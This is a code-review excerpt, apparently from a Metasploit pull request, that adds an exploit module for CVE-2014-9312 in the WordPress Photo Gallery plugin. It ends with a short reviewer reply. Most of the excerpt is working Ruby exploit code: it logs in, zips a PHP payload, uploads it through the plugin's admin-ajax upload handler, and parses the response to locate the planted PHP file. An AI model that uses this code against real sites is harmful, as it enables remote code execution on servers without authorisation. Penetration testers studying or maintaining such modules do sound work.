modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb

```diff
@@ -0,0 +1,116 @@
+                              does not properly verify or sanitize user-uploaded files.},
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Kacper Szurek',                  # Vulnerability disclosure
+          'Rob Carr <rob[at]rastating.com>' # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['OSVDB', '117676'],
+          ['WPVDB', '7769'],
+          ['CVE', '2014-9312']
+        ],
+      'DisclosureDate'  => 'Nov 11 2014',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['photo-gallery < 1.2.6', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+      ], self.class)
+  end
+
+  def check
+    check_plugin_version_from_readme('photo-gallery', '1.2.6')
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def generate_mime_message(payload, name)
+    data = Rex::MIME::Message.new
+    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    zip.add_file("#{name}.php", payload.encoded)
+    data.add_part(zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"files\"; filename=\"#{name}.zip\"")
+    data
+  end
+
+  def exploit
+    print_status("#{peer} - Authenticating using #{username}:#{password}...")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+    print_good("#{peer} - Authenticated with WordPress")
+
+    print_status("#{peer} - Preparing payload...")
+    payload_name = Rex::Text.rand_text_alpha(10)
+    uploader_url = normalize_uri(wordpress_url_admin_ajax, '?action=bwg_UploadHandler&dir=rce/')
+    data = generate_mime_message(payload, payload_name)
+
+    print_status("#{peer} - Uploading payload...")
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     => uploader_url,
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'data'    => data.to_s,
+      'cookie'  => cookie
+    )
+
+    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
+    vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
+    print_good("#{peer} - Uploaded the payload")
+
+    print_status("#{peer} - Parsing server response...")
+    json = JSON.parse(res.body)
+    if json.nil? || !json['files']
+      fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')
+    else
+      uploaded_name = json['files'][0]['name'][0..-5]
+      php_file_name = "#{uploaded_name}.php"
+      payload_url = normalize_uri(wordpress_url_backend, 'rce', uploaded_name, php_file_name)
+      print_good("#{peer} - Parsed response")
+
+      register_files_for_cleanup(php_file_name)
```

Comment:
Hey @FireFart - will make this change and the others later today and let you know once they're pushed up for a review